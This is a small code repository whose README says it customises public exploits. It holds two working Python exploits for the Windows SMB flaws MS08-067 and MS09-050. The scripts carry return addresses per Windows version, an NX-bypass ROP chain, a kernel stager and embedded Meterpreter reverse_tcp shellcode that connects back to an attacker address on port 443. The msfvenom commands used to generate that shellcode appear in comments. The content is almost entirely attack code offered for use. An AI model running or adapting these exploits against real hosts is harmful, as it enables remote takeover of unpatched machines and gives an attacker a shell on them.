├── MS08_067.py
├── MS09_050.py
└── README.md


/MS08_067.py:
--------------------------------------------------------------------------------
  1 | import struct
  2 | import time
  3 | import sys
  4 | 
  5 | 
  6 | from threading import Thread    #Thread is imported incase you would like to modify
  7 | 
  8 | 
  9 | try:
 10 | 
 11 |     from impacket import smb
 12 | 
 13 |     from impacket import uuid
 14 | 
 15 |     from impacket import dcerpc
 16 | 
 17 |     from impacket.dcerpc.v5 import transport
 18 | 
 19 | 
 20 | except ImportError, _:
 21 | 
 22 |     print 'Install the following library to make this script work'
 23 | 
 24 |     print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
 25 | 
 26 |     print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
 27 | 
 28 |     sys.exit(1)
 29 | 
 30 | 
 31 | print '#######################################################################'
 32 | 
 33 | print '#   MS08-067 Exploit'
 34 | 
 35 | print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
 36 | 
 37 | print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
 38 | 
 39 | print '#######################################################################\n'
 40 | 
 41 | 
 42 | #Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
 43 | #Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
 44 | #EXITFUNC=thread Important!
 45 | #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
 46 | shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 47 | shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 48 | shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 49 | shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
 50 | shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
 51 | shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
 52 | shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
 53 | shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
 54 | shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
 55 | shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
 56 | shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
 57 | shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
 58 | shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
 59 | shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
 60 | shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
 61 | shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
 62 | shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
 63 | shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
 64 | shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
 65 | shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
 66 | shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
 67 | shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
 68 | shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
 69 | shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
 70 | shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
 71 | shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
 72 | shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
 73 | shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
 74 | shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
 75 | shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
 76 | shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
 77 | shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
 78 | shellcode += "\x08\x9e\xe0"
 79 | 
 80 | nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
 81 | disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
 82 | ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
 83 | module_base = 0x6f880000
 84 | def generate_rop(rvas):
 85 | 	gadget1="\x90\x5a\x59\xc3"
 86 | 	gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]	
 87 | 	gadget3="\xcc\x90\xeb\x5a"	
 88 | 	ret=struct.pack('<L', 0x00018000)
 89 | 	ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
 90 | 	ret+=struct.pack('<L', 0x01040110)
 91 | 	ret+=struct.pack('<L', 0x01010101)
 92 | 	ret+=struct.pack('<L', 0x01010101)
 93 | 	ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
 94 | 	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
 95 | 	ret+=gadget1
 96 | 	ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
 97 | 	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
 98 | 	ret+=gadget2[0]
 99 | 	ret+=gadget2[1]
100 | 	ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
101 | 	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
102 | 	ret+=gadget2[2]
103 | 	ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
104 | 	ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
105 | 	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
106 | 	ret+=gadget3	
107 | 	return ret
108 | class SRVSVC_Exploit(Thread):
109 | 
110 |     def __init__(self, target, os, port=445):
111 | 
112 |         super(SRVSVC_Exploit, self).__init__()
113 | 
114 |         self.__port   = port
115 | 
116 |         self.target   = target
117 | 	self.os	      = os
118 | 
119 | 
120 |     def __DCEPacket(self):
121 | 	if (self.os=='1'):
122 | 		print 'Windows XP SP0/SP1 Universal\n'
123 | 		ret = "\x61\x13\x00\x01"
124 | 		jumper = nonxjmper % (ret, ret)
125 | 	elif (self.os=='2'):
126 | 		print 'Windows 2000 Universal\n'
127 | 		ret = "\xb0\x1c\x1f\x00"
128 | 		jumper = nonxjmper % (ret, ret)
129 | 	elif (self.os=='3'):
130 | 		print 'Windows 2003 SP0 Universal\n'
131 | 		ret = "\x9e\x12\x00\x01"  #0x01 00 12 9e
132 | 		jumper = nonxjmper % (ret, ret)
133 | 	elif (self.os=='4'):
134 | 		print 'Windows 2003 SP1 English\n'
135 | 		ret_dec = "\x8c\x56\x90\x7c"  #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
136 | 		ret_pop = "\xf4\x7c\xa2\x7c"  #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
137 | 		jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
138 | 		disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
139 | 		jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
140 | 	elif (self.os=='5'):
141 | 		print 'Windows XP SP3 French (NX)\n'
142 | 		ret = "\x07\xf8\x5b\x59"  #0x59 5b f8 07 
143 | 		disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 
144 | 		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
145 | 	elif (self.os=='6'):
146 | 		print 'Windows XP SP3 English (NX)\n'
147 | 		ret = "\x07\xf8\x88\x6f"  #0x6f 88 f8 07 
148 | 		disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 
149 | 		jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.
150 | 	elif (self.os=='7'):
151 | 		print 'Windows XP SP3 English (AlwaysOn NX)\n'
152 | 		rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
153 | 		jumper = generate_rop(rvasets)+"AB"  #the nonxjmper also work in this case.
154 | 	else:
155 | 		print 'Not supported OS version\n'
156 | 		sys.exit(-1)
157 | 	print '[-]Initiating connection'
158 | 
159 |         self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
160 | 
161 |         self.__trans.connect()
162 | 
163 |         print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
164 | 
165 |         self.__dce = self.__trans.DCERPC_class(self.__trans)
166 | 
167 |         self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
168 | 
169 | 
170 | 
171 | 
172 |         path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00"  + jumper + "\x00" * 2
173 | 
174 |         server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
175 |         prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
176 | 
177 |         self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
178 | 
179 |         return
180 | 
181 | 
182 | 
183 |     def run(self):
184 | 
185 |         self.__DCEPacket()
186 | 
187 |         self.__dce.call(0x1f, self.__stub) 
188 |         time.sleep(5)
189 |         print 'Exploit finish\n'
190 | 
191 | 
192 | 
193 | if __name__ == '__main__':
194 | 
195 |        try:
196 | 
197 |            target = sys.argv[1]
198 | 	   os = sys.argv[2]
199 | 
200 |        except IndexError:
201 | 
202 | 				print '\nUsage: %s <target ip>\n' % sys.argv[0]
203 | 
204 | 				print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
205 | 				print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
206 | 
207 | 				sys.exit(-1)
208 | 
209 | 
210 | 
211 | current = SRVSVC_Exploit(target, os)
212 | 
213 | current.start()
214 | 
215 | 
216 | 
217 | 
218 | 
219 | 


--------------------------------------------------------------------------------
/MS09_050.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | #This module depends on the linux command line program smbclient. 
  3 | #I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
  4 | #The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
  5 | import tempfile
  6 | import sys
  7 | import subprocess
  8 | from socket import socket
  9 | from time import sleep
 10 | from smb.SMBConnection import SMBConnection
 11 | 
 12 | 
 13 | try:
 14 | 
 15 | 	target = sys.argv[1]
 16 | except IndexError:
 17 | 	print '\nUsage: %s <target ip>\n' % sys.argv[0]
 18 | 	print 'Example: MS36299.py 192.168.1.1 1\n'
 19 | 	sys.exit(-1)
 20 | 
 21 | #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread  -f python
 22 | shell =  ""
 23 | shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"   #fce8820000006089e531c0648b
 24 | shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
 25 | shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
 26 | shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
 27 | shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
 28 | shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
 29 | shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
 30 | shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
 31 | shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
 32 | shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
 33 | shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
 34 | shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
 35 | shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
 36 | shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01"
 37 | shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
 38 | shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
 39 | shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
 40 | shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
 41 | shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
 42 | shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
 43 | shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
 44 | shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
 45 | shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
 46 | shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
 47 | shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
 48 | shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
 49 | shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
 50 | shell += "\x53\xff\xd5"
 51 | 
 52 | 
 53 | 
 54 | host = target, 445
 55 | 
 56 | buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
 57 | buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
 58 | buff+="\x17\x02" #high process ID
 59 | buff+="\x00\xe9\x58\x01\x00\x00"
 60 | buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
 61 | buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
 62 | buff+="\x04\x0d\xdf\xff"*25
 63 | buff+="\x00\x02\x53\x4d"
 64 | buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
 65 | buff+="\x00\x00\x00\x00"*37
 66 | buff+="\xff\xff\xff\xff"*2
 67 | buff+="\x42\x42\x42\x42"*7
 68 | buff+="\xb4\xff\xff\x3f" #magic index
 69 | buff+="\x41\x41\x41\x41"*6
 70 | buff+="\x09\x0d\xd0\xff" #return address
 71 | 
 72 | #stager_sysenter_hook from metasploit
 73 | 
 74 | buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
 75 | buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
 76 | buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
 77 | buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
 78 | buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
 79 | buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
 80 | buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
 81 | buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
 82 | buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
 83 | buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
 84 | buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
 85 | buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
 86 | buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
 87 | buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
 88 | buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
 89 | buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
 90 | buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
 91 | buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
 92 | buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
 93 | buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
 94 | buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
 95 | buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
 96 | buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
 97 | buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
 98 | buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
 99 | buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
100 | 
101 | buff+=shell
102 | 
103 | s = socket()
104 | s.connect(host)
105 | s.send(buff)
106 | s.close() 
107 | #Trigger the above injected code via authenticated process.
108 | subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
109 | 
110 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Exploit
2 | <p>This project is for customizing some public exploit codes so that they work for different target systems / environment.</p>
3 | 
4 | 
5 | 


--------------------------------------------------------------------------------